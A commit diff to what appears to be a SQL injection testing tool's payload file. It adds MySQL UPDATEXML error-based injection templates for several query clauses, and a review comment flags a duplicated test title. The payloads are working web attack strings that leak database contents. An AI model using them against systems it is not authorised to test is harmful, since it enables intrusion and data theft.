
Commit ca83305

committed
added MySQL updatexml error-based payload
1 parent 2033a28 commit ca83305

1 file changed

Lines changed: 88 additions & 8 deletions


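--- a/xml/payloads.xml
+++ b/xml/payloads.xml
@@ -1010,15 +1010,35 @@ Formats:
 </test>
 
 <test>
-<title>MySQL &gt;= 5.1 AND error-based - WHERE or HAVING clause</title>
+<title>MySQL &gt;= 5.1 AND error-based - WHERE or HAVING clause (EXTRACTVALUE)</title>
 <stype>2</stype>
 <level>2</level>
 <risk>0</risk>
 <clause>1</clause>
 <where>1</where>
-<vector>AND EXTRACTVALUE([RANDNUM], CONCAT('\', '[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]'))</vector>
+<vector>AND EXTRACTVALUE([RANDNUM],CONCAT('\','[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]'))</vector>
 <request>
-<payload>AND EXTRACTVALUE([RANDNUM], CONCAT('\', '[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]'))</payload>
+<payload>AND EXTRACTVALUE([RANDNUM],CONCAT('\','[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]'))</payload>
+</request>
+<response>
+<grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>
+</response>
+<details>
+<dbms>MySQL</dbms>
+<dbms_version>&gt;= 5.1</dbms_version>
+</details>
+</test>
+
+<test>
+<title>MySQL &gt;= 5.1 AND error-based - WHERE or HAVING clause (UPDATEXML)</title>
+<stype>2</stype>
+<level>3</level>
+<risk>0</risk>
+<clause>1</clause>
+<where>1</where>
+<vector>AND UPDATEXML([RANDNUM],CONCAT('.','[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]'),[RANDNUM1])</vector>
+<request>
+<payload>AND UPDATEXML([RANDNUM],CONCAT('.','[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]'),[RANDNUM1])</payload>
 </request>
 <response>
 <grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>
@@ -1208,15 +1228,35 @@ Formats:
 </test>
 
 <test>
-<title>MySQL &gt;= 5.1 OR error-based - WHERE or HAVING clause</title>
+<title>MySQL &gt;= 5.1 OR error-based - WHERE or HAVING clause (EXTRACTVALUE)</title>
 <stype>2</stype>
 <level>3</level>
 <risk>2</risk>
 <clause>1</clause>
 <where>1</where>
-<vector>OR EXTRACTVALUE([RANDNUM], CONCAT('\', '[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]'))</vector>
+<vector>OR EXTRACTVALUE([RANDNUM],CONCAT('\', '[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]'))</vector>
+<request>
+<payload>OR EXTRACTVALUE([RANDNUM],CONCAT('\', '[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]'))</payload>
+</request>
+<response>
+<grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>
+</response>
+<details>
+<dbms>MySQL</dbms>
+<dbms_version>&gt;= 5.1</dbms_version>
+</details>
+</test>
+
+<test>
+<title>MySQL &gt;= 5.1 OR error-based - WHERE or HAVING clause (UPDATEXML)</title>
+<stype>2</stype>
+<level>4</level>
+<risk>2</risk>
+<clause>1</clause>
+<where>1</where>
+<vector>OR UPDATEXML([RANDNUM],CONCAT('.','[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]'),[RANDNUM1])</vector>
 <request>
-<payload>OR EXTRACTVALUE([RANDNUM], CONCAT('\', '[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]'))</payload>
+<payload>OR UPDATEXML([RANDNUM],CONCAT('.','[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]'),[RANDNUM1])</payload>
 </request>
 <response>
 <grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>
@@ -1433,7 +1473,7 @@ Formats:
 </test>
 
 <test>
-<title>MySQL &gt;= 5.1 - Parameter replace</title>
+<title>MySQL &gt;= 5.1 error-based - Parameter replace (EXTRACTVALUE)</title>
 <stype>2</stype>
 <level>3</level>
 <risk>0</risk>
@@ -1452,6 +1492,26 @@ Formats:
 </details>
 </test>
 
+<test>
+<title>MySQL &gt;= 5.1 error-based - Parameter replace (UPDATEXML)</title>
+<stype>2</stype>
+<level>4</level>
+<risk>0</risk>
+<clause>1,2,3</clause>
+<where>3</where>
+<vector>(UPDATEXML([RANDNUM],CONCAT('.','[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]'),[RANDNUM1]))</vector>
+<request>
+<payload>(UPDATEXML([RANDNUM],CONCAT('.','[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]'),[RANDNUM1]))</payload>
+</request>
+<response>
+<grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>
+</response>
+<details>
+<dbms>MySQL</dbms>
+<dbms_version>&gt;= 5.1</dbms_version>
+</details>
+</test>
+
 <test>
 <title>PostgreSQL error-based - Parameter replace</title>
 <stype>2</stype>
@@ -1554,7 +1614,7 @@ Formats:
 </test>
 
 <test>
-<title>MySQL &gt;= 5.1 error-based - GROUP BY and ORDER BY clauses</title>
+<title>MySQL &gt;= 5.1 error-based - GROUP BY and ORDER BY clauses (EXTRACTVALUE)</title>
 <stype>2</stype>
 <level>3</level>
 <risk>0</risk>
@@ -1573,6 +1633,26 @@ Formats:
 </details>
 </test>
 
+<test>
+<title>MySQL &gt;= 5.1 error-based - Parameter replace (UPDATEXML)</title>
+<stype>2</stype>
+<level>4</level>
+<risk>0</risk>
+<clause>2,3</clause>
+<where>1</where>
+<vector>,UPDATEXML([RANDNUM],CONCAT('.','[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]'),[RANDNUM1])</vector>
+<request>
+<payload>,UPDATEXML([RANDNUM],CONCAT('.','[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]'),[RANDNUM1])</payload>
+</request>
+<response>
+<grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>
+</response>
+<details>
+<dbms>MySQL</dbms>
+<dbms_version>&gt;= 5.1</dbms_version>
+</details>
+</test>
+
 <test>
 <title>PostgreSQL error-based - GROUP BY and ORDER BY clauses</title>
 <stype>2</stype>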
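Review bot: The title of the UPDATEXML test added in the last hunk (new line 1637) is `MySQL &gt;= 5.1 error-based - Parameter replace (UPDATEXML)`, which is the exact title already used by the Parameter-replace test added at new line 1496, while this test's leading-comma vector, `<clause>2,3</clause>` and the neighbouring EXTRACTVALUE sibling all place it in the GROUP BY and ORDER BY section; it should read `<title>MySQL &gt;= 5.1 error-based - GROUP BY and ORDER BY clauses (UPDATEXML)</title>`. Two tests with one title are hard to tell apart wherever the title is reported, and the mislabel hides which clause the test actually targets. A smaller consistency point in the second hunk: the OR EXTRACTVALUE vector and payload (new lines 1237 and 1239) keep the space in `CONCAT('\', '[DELIMITER_START]'`, whereas the AND variant in the first hunk was normalised in this same commit to `CONCAT('\','[DELIMITER_START]'`; aligning the OR pair would keep the boundary strings uniform.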
